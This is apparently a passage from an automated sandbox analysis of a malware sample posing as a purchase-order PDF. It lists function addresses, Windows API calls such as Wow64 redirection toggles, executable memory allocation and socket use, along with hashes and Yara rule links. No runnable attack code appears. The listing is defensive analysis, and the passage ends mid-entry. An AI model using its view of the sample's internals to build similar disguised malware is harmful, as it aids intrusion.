Instruction Fuzzy Hash: 3E318E31204209ABEB218E38DC45BEA77A9FF45324F248725FA79D32E0D731E8519B50

Function 008F7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008F76D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008F76E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 008F7708

Strings

SysMonthCal32, xrefs: 008F769B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: c1d2573f376b2bb76011ff310d64965cff7ab103bb79afc57b135ccdaeaaeec7
Instruction ID: 6b331e4df5194df4910d821c2495ee2605515e9e3e634a81e336d5aca6e0dd54
Opcode Fuzzy Hash: c1d2573f376b2bb76011ff310d64965cff7ab103bb79afc57b135ccdaeaaeec7
Instruction Fuzzy Hash: 6621BF32510218BBEF118E64CC46FEA3BA9FF98714F110214FF15AB1D0DAB5A850DBA0

Function 008F6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 008F6FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 008F6FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 008F6FDF

Strings

Listbox, xrefs: 008F6F77

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: dc1d9ef69c4ecb636b906b53418da61ffc7fe17e5328bca47eb195e2a5a3853f
Instruction ID: 5862499cb5be5308effaaf5359415a715d5f04b8e02b16efea5e3f47cd72643a
Opcode Fuzzy Hash: dc1d9ef69c4ecb636b906b53418da61ffc7fe17e5328bca47eb195e2a5a3853f
Instruction Fuzzy Hash: 98218032610118BFDF118F64DC85EBB3BAAFF89754F118224FA14DB190DA71AC61CBA0

Function 008F797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008F79E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008F79F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008F7A03

Strings

msctls_trackbar32, xrefs: 008F79B8

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 8f0f18514bbe88cbd2a7ed509f039d629dc03cb73181ebbd1a1008658faf3214
Instruction ID: a7f3792c4b3c555f16914626eda9f354337336bc555bb0f379d340aec6b5c2f7
Opcode Fuzzy Hash: 8f0f18514bbe88cbd2a7ed509f039d629dc03cb73181ebbd1a1008658faf3214
Instruction Fuzzy Hash: EA11C132254208BAEF209E74CC05FAB7BA9FF89764F124529FB45A6091D671A811DB60

Function 00874C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00874C2E), ref: 00874CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00874CB5

Strings

kernel32.dll, xrefs: 00874C9E
GetNativeSystemInfo, xrefs: 00874CAF

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: cb916993cdb3b26d7620d06a16fb45da78452109fdca32938debb507a7d02c5d
Instruction ID: c0ce69a684abafd5527418cac359b4ab920b0de17d4c738e265020529c342050
Opcode Fuzzy Hash: cb916993cdb3b26d7620d06a16fb45da78452109fdca32938debb507a7d02c5d
Instruction Fuzzy Hash: DAD0C730500327CFC7218F30CA08A2272E4FF007A0B10C83AAA9AD2250E774C8C0CA10

Function 00874D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00874CE1,?), ref: 00874DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00874DB4

Strings

kernel32.dll, xrefs: 00874D9D
Wow64RevertWow64FsRedirection, xrefs: 00874DAE

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 41d34f109ef73bf5996d2bce647c85a1d47c6e3f4e90f240fd9fd28d841aa2d5
Instruction ID: e53a92468bcf57689b9a4ac41a2d6cb15f8ee5dfd3416b68388565b82ed3bc9b
Opcode Fuzzy Hash: 41d34f109ef73bf5996d2bce647c85a1d47c6e3f4e90f240fd9fd28d841aa2d5
Instruction Fuzzy Hash: 90D0C730540323CFC7308F30D808A56BAE4FF04358B00C83AE9EAD2254E770C8C0CA10

Function 00874D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00874D2E,?,00874F4F,?,009362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00874D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00874D81

Strings

kernel32.dll, xrefs: 00874D6A
Wow64DisableWow64FsRedirection, xrefs: 00874D7B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: e3cb1d9a03ada0eecd9be07a33ac3269d9bfafa9bd46c33ecc912c50fcce27b5
Instruction ID: 0fa395dc1e02db503aa518ed0739420cd57774cbc25ff8c8698130a28c5650cb
Opcode Fuzzy Hash: e3cb1d9a03ada0eecd9be07a33ac3269d9bfafa9bd46c33ecc912c50fcce27b5
Instruction Fuzzy Hash: FDD01730510723CFD7319F71D888A26BAE8FF15362B11C83AA5DAD6254E774D8C0CA50

Function 008F1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,008F12C1), ref: 008F1080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008F1092

Strings

RegDeleteKeyExW, xrefs: 008F108C
advapi32.dll, xrefs: 008F107B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 647cf09f4a43572a3ecb2db55f7a1cb27504443e3592a11ed26866cee2ac6dd2
Instruction ID: c7035299981e0341d768d883bac5fb4b3ac1ea4fbdaa833d2a50b941365728cd
Opcode Fuzzy Hash: 647cf09f4a43572a3ecb2db55f7a1cb27504443e3592a11ed26866cee2ac6dd2
Instruction Fuzzy Hash: B3D01730510B27CFDB309F35E818A2A76E4FF95365B118C3AA59ADA250EB70D8C0CB50

Function 008E93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,008E9009,?,008FF910), ref: 008E9403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008E9415

Strings

kernel32.dll, xrefs: 008E93FE
GetModuleHandleExW, xrefs: 008E940F

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 9557b79a6c7716ac0f9b8b8963d02129d03d3d15aa22bb5109eb000e22cca34b
Instruction ID: 96b3a65103e551682b9d8cc7c5f37cee6c49bb2e7d6fa1382048f447586a9d5a
Opcode Fuzzy Hash: 9557b79a6c7716ac0f9b8b8963d02129d03d3d15aa22bb5109eb000e22cca34b
Instruction Fuzzy Hash: E6D0C730500323CFC7208F32D908A1272E4FF02355B00C83AE6C2D2691E6B0C8C0CA10

Function 008C76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eb8dbf1f88eb8a1b7538915d1fca9ad1f6419a4fe7c79f1fc7aefedb56b2894
Instruction ID: d375df85bb0695d198b43bfa3e342bd9c80918c0d088d3a9a2f3401c48207057
Opcode Fuzzy Hash: 5eb8dbf1f88eb8a1b7538915d1fca9ad1f6419a4fe7c79f1fc7aefedb56b2894
Instruction Fuzzy Hash: CDC12975A0421AEFCB14CFA4C884EAEBBB5FF48714B15859DE906EB251D730ED81CB90

Function 008EE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 008EE3D2
CharLowerBuffW.USER32(?,?), ref: 008EE415

Part of subcall function 008EDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008EDAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 008EE615
_memmove.LIBCMT ref: 008EE628

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 235f78eac9c83f5fb29a36cfafbefa98273853520c62805bff5449cba2fd2c0b
Instruction ID: 543e629246cea18b2e36abf8265bbd50a6b4d91e1a71680f878c991cf2afce42
Opcode Fuzzy Hash: 235f78eac9c83f5fb29a36cfafbefa98273853520c62805bff5449cba2fd2c0b
Instruction Fuzzy Hash: 4CC167716083519FC714DF29C48096ABBE4FF89318F04896EF999DB351D731EA45CB82

Function 008E83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 008E83D8
CoUninitialize.OLE32 ref: 008E83E3

Part of subcall function 008CDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008CDAC5

VariantInit.OLEAUT32(?), ref: 008E83EE
VariantClear.OLEAUT32(?), ref: 008E86BF

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 9bf7101d5a9f4a0f5f82e06e21a391bfe8cd4f317519fdc09de3e5ded7780a17
Instruction ID: ea856cd892ccc112c66732d1586c9bd4566ae886c02eef44e7d37ccb4f173d93
Opcode Fuzzy Hash: 9bf7101d5a9f4a0f5f82e06e21a391bfe8cd4f317519fdc09de3e5ded7780a17
Instruction Fuzzy Hash: 40A103752047519FDB10DF29C485A2ABBE4FF99324F048459FA9ADB3A2CB30ED40CB46

Function 008C7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00902C7C,?), ref: 008C7C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00902C7C,?), ref: 008C7C4A
CLSIDFromProgID.OLE32(?,?,00000000,008FFB80,000000FF,?,00000000,00000800,00000000,?,00902C7C,?), ref: 008C7C6F
_memcmp.LIBCMT ref: 008C7C90

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 8c30974a5932bda572d717e26be2ee3fe2ee1acbae5db76304addd6804dc445c
Instruction ID: ca765b6a334840217e430e7ebc8f91d87b655b27b14bc9e5a51c9c0ce0c30719
Opcode Fuzzy Hash: 8c30974a5932bda572d717e26be2ee3fe2ee1acbae5db76304addd6804dc445c
Instruction Fuzzy Hash: 1C81F975A0010AEFCB04DF94C984EEEB7B9FF89315F204198E515EB250DB71AE06CB61

Function 008C6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008C6E04
SysAllocString.OLEAUT32(00000000), ref: 008C6EAD
VariantCopy.OLEAUT32 ref: 008C6EDC
VariantClear.OLEAUT32(?), ref: 008C6F03

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 6acbf199625a08449db9b80051add5515796a464dadc15dc0e1c7f4972417092
Instruction ID: a879430ae78dbc93c2522c47fa002b7f6aa6eaea9ec1c65aa041619c6ac7b91b
Opcode Fuzzy Hash: 6acbf199625a08449db9b80051add5515796a464dadc15dc0e1c7f4972417092
Instruction Fuzzy Hash: 8E5193216147059BDB20AF69D891F2AB3B5FF48310F24882FE59ACB291EE70D850DF16

Function 008F9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0122F158,?), ref: 008F9AD2
ScreenToClient.USER32(00000002,00000002), ref: 008F9B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 008F9B72

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 88f7b4a3dd92d82148e18e6001066735ab067ced325f57c36bd7c06246566984
Instruction ID: 34939ae41e19aff015fb1e5fa3c79bf458d0d3c8f8d2dc565e9525892ea9800c
Opcode Fuzzy Hash: 88f7b4a3dd92d82148e18e6001066735ab067ced325f57c36bd7c06246566984
Instruction Fuzzy Hash: 74511B34A00219AFCF24DF68D880ABE7BB5FF54320F208159FA55DB290D730AD41DB90

Function 008E6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 008E6CE4
WSAGetLastError.WSOCK32(00000000), ref: 008E6CF4

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 008E6D58
WSAGetLastError.WSOCK32(00000000), ref: 008E6D64

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 7c96ef6c3720e540797c080b9c3535e8ab2d56bfb7987bd4796f594472f70a99
Instruction ID: 39a01d76e80b86ae1cf9297ef4bb4893a34aa55acc295cd072d75ceb46edce6b
Opcode Fuzzy Hash: 7c96ef6c3720e540797c080b9c3535e8ab2d56bfb7987bd4796f594472f70a99
Instruction Fuzzy Hash: 59416E75740210AFEB10AF28DC86F3A76A5FF54B64F44C428FA59DB2D2DA71DD008B92

Function 008E672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,008FF910), ref: 008E67BA
_strlen.LIBCMT ref: 008E67EC

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 52d78904fa628034ffee7525b5c7c4b9ea11d813eae27908d712ef36ce0cd168
Instruction ID: e4738d0724d7c6d9b234d41729c8f6c9fd613941deaa346e8c421109e172cd7f
Opcode Fuzzy Hash: 52d78904fa628034ffee7525b5c7c4b9ea11d813eae27908d712ef36ce0cd168
Instruction Fuzzy Hash: B641D531A00114ABCB14EB69DCC1FAEB7A9FF55354F148169F929D7292EB30ED10CB92

Function 008DBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008DBB09
GetLastError.KERNEL32(?,00000000), ref: 008DBB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008DBB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008DBB80

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 39067aeb5e609eb58524601fa63c014d219486702134d28c38c0ac230f4d3d61
Instruction ID: 9d9a0a27cc187f0b6094a2a41e96deffed5a75dc3e123d7325e9a501b37d6593
Opcode Fuzzy Hash: 39067aeb5e609eb58524601fa63c014d219486702134d28c38c0ac230f4d3d61
Instruction Fuzzy Hash: F4410439200610DFCB11EF19C584A5DBBE1FF99320B19C499E98A9B366CB34FD41CB92

Function 008F8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008F8B4D

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 6e14abfba8cb5fb0f76883800032fe29992b329a6aa7e7ca072c2952fa29c95c
Instruction ID: f1f83c66b01a31d558414f5d00c03ac91abd2eb285989abdec270236f676a7b1
Opcode Fuzzy Hash: 6e14abfba8cb5fb0f76883800032fe29992b329a6aa7e7ca072c2952fa29c95c
